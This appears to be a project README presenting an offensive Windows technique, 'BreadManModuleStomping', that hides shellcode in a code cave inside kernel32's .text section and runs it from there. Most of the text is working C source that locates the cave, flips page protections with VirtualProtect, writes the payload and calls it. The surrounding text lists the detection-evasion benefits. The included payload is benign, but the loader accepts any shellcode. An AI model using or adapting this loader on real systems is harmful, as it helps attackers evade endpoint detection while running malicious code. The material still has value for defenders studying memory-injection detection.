This project was created to show off a technique I created called BreadManModuleStomping. It performs module stomping with a twist: instead of loading a module into memory and then overwriting the contents of its .text section with a malicious payload, it does the following:
- Searches a previously loaded module (e.g. kernel32) for a code cave with enough capacity to hold our shellcode
- Changes the cave's memory protection from execute & read to read & write
- Writes the payload into the code cave
- Executes the payload in the code cave (after the page protection is restored to an executable setting, since DEP will not run code from a read & write page)
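The four steps above, as an added example that is not the project's own code: a portable code-cave scanner, plus (under `_WIN32`) the stomp itself against the already-mapped kernel32. The choice of cave bytes (0x00 and 0xCC padding), the sample section bytes, and the benign `mov eax, 0x1337; ret` payload are assumptions made here for illustration.

```c
/* breadman_cave_demo.c -- added example, not the project's own code.
 * Assumptions: cave bytes are 0x00 or 0xCC padding; the payload is a benign
 * "mov eax, 0x1337; ret" stub; the sample section bytes below are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Step 1: find the first run of at least `need` padding bytes (0x00 or 0xCC)
 * in a code section. Returns the offset of the run, or -1 if nothing fits.
 * A long padding run is unlikely to be live code, but a zero-filled table
 * embedded in .text could also match, so prefer the section's trailing slack. */
static long find_code_cave(const uint8_t *buf, size_t len, size_t need)
{
    size_t run = 0;
    if (need == 0) return -1;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00 || buf[i] == 0xCC) {
            if (++run >= need)
                return (long)(i + 1 - run);   /* start of the run */
        } else {
            run = 0;
        }
    }
    return -1;
}

/* Constructed sample "section" (assumption): code with padding runs that are
 * too small, then an 8-byte INT3 pad followed by 4 bytes of zero slack. */
static const uint8_t sample_text[] = {
    0x55, 0x48, 0x89, 0xE5, 0xC3,                   /* push rbp; mov rbp,rsp; ret       */
    0xCC, 0xCC, 0xCC,                               /* 3-byte INT3 pad (offset 5)        */
    0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3,             /* mov eax,1; ret (zeros inside code)*/
    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, /* 8-byte pad (offset 14)            */
    0x00, 0x00, 0x00, 0x00                          /* zero slack: run grows to 12 bytes */
};

/* Benign payload (assumption): x86/x64 "mov eax, 0x1337 ; ret". */
static const uint8_t payload[] = { 0xB8, 0x37, 0x13, 0x00, 0x00, 0xC3 };

#ifdef _WIN32
/* Walk the PE headers of an already-loaded module to locate its .text section. */
static int get_text_section(HMODULE mod, uint8_t **base, size_t *size)
{
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)mod;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((uint8_t *)mod + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return 0;
    IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt);
    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (strncmp((const char *)sec->Name, ".text", IMAGE_SIZEOF_SHORT_NAME) == 0) {
            *base = (uint8_t *)mod + sec->VirtualAddress;
            *size = sec->Misc.VirtualSize;
            return 1;
        }
    }
    return 0;
}

/* Steps 2-4 against kernel32, which is already mapped in every process:
 * GetModuleHandle, not LoadLibrary, so the loader and file system are untouched. */
static int stomp_and_run(const uint8_t *code, size_t len)
{
    HMODULE k32 = GetModuleHandleA("kernel32.dll");
    uint8_t *text; size_t text_size; DWORD old;
    if (!k32 || !get_text_section(k32, &text, &text_size)) return -1;

    long off = find_code_cave(text, text_size, len);
    if (off < 0) return -2;
    uint8_t *cave = text + off;

    /* RX -> RW; image pages are copy-on-write, so only this process sees the change. */
    if (!VirtualProtect(cave, len, PAGE_READWRITE, &old)) return -3;
    memcpy(cave, code, len);
    /* Back to RX: DEP will not run code from a read/write page. */
    if (!VirtualProtect(cave, len, PAGE_EXECUTE_READ, &old)) return -4;
    FlushInstructionCache(GetCurrentProcess(), cave, len);

    int (*fn)(void) = (int (*)(void))cave;
    return fn();   /* the payload now executes from an address inside kernel32's .text */
}
#endif

int main(void)
{
#ifdef _WIN32
    int rc = stomp_and_run(payload, sizeof payload);
    printf("payload returned 0x%x (expected 0x1337)\n", rc);
#else
    printf("cave for %zu bytes at offset %ld\n", sizeof payload,
           find_code_cave(sample_text, sizeof sample_text, sizeof payload));
#endif
    return 0;
}
```

On Windows, build with MSVC or MinGW and run it: the payload returns 0x1337 from inside kernel32's code section. On any other platform only the scanner runs, over the constructed sample section. Note the second `VirtualProtect` back to `PAGE_EXECUTE_READ`: the page's step list goes straight from "read & write" to "execute", but DEP will fault on a read/write page, so the protection has to be flipped back before the call.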
This has a few benefits from an offensive security perspective:
- Does not require interaction with the file system or the Windows loader, so fewer file and image-load events are generated that could trigger detection.
- Code execution appears to come from a legitimately loaded module in the call stack, so call-stack inspection is less likely to flag it.
Note that the stomped bytes no longer match the module's on-disk image, so scanners that compare a loaded .text section against the file on disk can still spot the change.